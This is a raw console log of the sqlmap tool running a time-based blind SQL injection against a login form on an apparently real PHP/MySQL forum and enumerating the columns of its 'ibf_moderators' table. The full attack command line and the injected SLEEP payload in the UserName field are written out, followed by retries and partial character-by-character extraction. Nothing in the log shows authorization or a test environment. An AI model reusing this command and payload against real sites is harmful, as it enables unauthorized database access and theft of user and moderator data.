C:\sql>python sqlmap.py -r 3.txt -D www -T ibf_moderators --columns --time-sec=10 --random-agent --risk=3 --level=1
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-201512260a8c}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 15:55:42
[15:55:42] [INFO] parsing HTTP request from '3.txt'
[15:55:42] [INFO] fetched random HTTP User-Agent header from file 'C:\sql\txt\user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.14) Gecko/2009090217 Ubuntu/9.04 (jaunty) Firefox/3.0.13'
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[15:55:43] [INFO] resuming back-end DBMS 'mysql'
[15:55:43] [INFO] testing connection to the target URL
[15:55:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] y
[15:55:44] [WARNING] reflective value(s) found and filtering out
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: submit=%c2%ee%e9%f2%e8&CookieDate=1&PassWord=g00dP a$$w0rD&Privacy=1&referer=&UserName=' AND (SELECT * FROM (SELECT(SLEEP(10)))XUFF) AND 'tyxC'='tyxC
---
[15:55:44] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.16
back-end DBMS: MySQL 5.0.12
[15:55:44] [INFO] fetching columns for table 'ibf_moderators' in database 'www'
[15:55:44] [INFO] resuming partial value: 2
[15:55:44] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[15:56:01] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[15:56:12] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:56:23] [ERROR] invalid character detected. retrying..
[15:56:34] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:56:45] [ERROR] invalid character detected. retrying..
[15:56:56] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:11] [ERROR] invalid character detected. retrying..
[15:57:22] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:33] [ERROR] invalid character detected. retrying..
[15:57:43] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:57:55] [ERROR] invalid character detected. retrying..
[15:58:05] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:58:16] [ERROR] unable to properly validate last character value ('7')..
7
[15:58:17] [INFO] retrieved:
[15:58:38] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:58:50] [ERROR] invalid character detected. retrying..
[15:59:00] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:59:21] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[15:59:32] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
m
[15:59:54] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
i
[16:00:29] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[16:00:51] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[16:00:51] [ERROR] invalid character detected. retrying..